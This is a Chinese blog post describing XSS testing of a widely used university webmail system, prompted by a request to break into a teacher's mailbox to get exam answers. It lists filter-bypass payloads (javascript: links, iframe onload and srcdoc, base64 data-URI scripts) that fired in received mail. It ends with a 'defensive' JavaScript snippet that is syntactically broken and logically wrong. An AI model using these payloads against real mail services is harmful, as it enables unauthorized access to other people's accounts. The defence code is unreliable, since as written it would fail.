0×00 起因 因可能导致一些影响,所以文章不提该邮件系统的名称。该邮件系统是众多高校,教育机构使用的邮件系统,去年有个小弟问我能否入侵老师的邮箱,测试了下于是便有了这篇文章,文章仅供技术研究,若用于非法手段,本人概不负责。 0×01 挖掘思路 (因为是一年前的事情 当时未截图,凭回忆写,图片没有,但是保证价值一分未少v^v。 渗透是思路,大家如果觉得这篇文章有价值可以多看几遍。) lusiyu@ubuntu:~$ telnet xxx.edu.cn 110 Trying 202.116.xx.xx... Connected to xxx.edu.cn. Escape character is '^]'. +OK Welcome to coremail Mail Pop3 Server (gdufss[f38963dfe10fa8653143525dfb027a3es]) 可得知邮箱系统采用的是xxx mail,初步看了下,如果能找到一个XSS或者有意义的CSRF 入侵邮箱 考试满分便不再是梦想。 <a href=javascirpt:alert(1)>请点击</a> <iframe/onload=alert(1)> 收到后查看内容 <script>alert(1);</script> base64编码 PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4= 源代码编辑输入 <a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=>aa</a> 发送邮件,接收后点击,成功XSS。 <iframe/onddd=alert(1)> 依旧发现onddd标签被过滤 <iframe srcdoc='<script>alert(1)</script>'> 登登 成功XSS収邮件者 <script> If(location.href.indexof(“<”)||location.href.indexof(“>”)||location.href.indexof(“%3c”)||location.href.indexof(“%3e”)||location.href.indexof(“javascript:”)||location.href.indexof(“vbscript:”) { window.stop ? window.stop() : document.execCommand("Stop"); </script> 每个页面都嵌入这个JS便可以有效防止反射型XSS(包括DOM XSS),或GET型导致的存储型XSS。如被绕过可再更改此JS 慢慢完善。具体根据业务情况而定。 |
-
上一篇: Struts2再曝S2-020补丁绕过漏洞 – 万恶的正则表达
下一篇: 一次通过漏洞挖掘成功渗透某网站的过程 - 网站
还没有人抢沙发呢~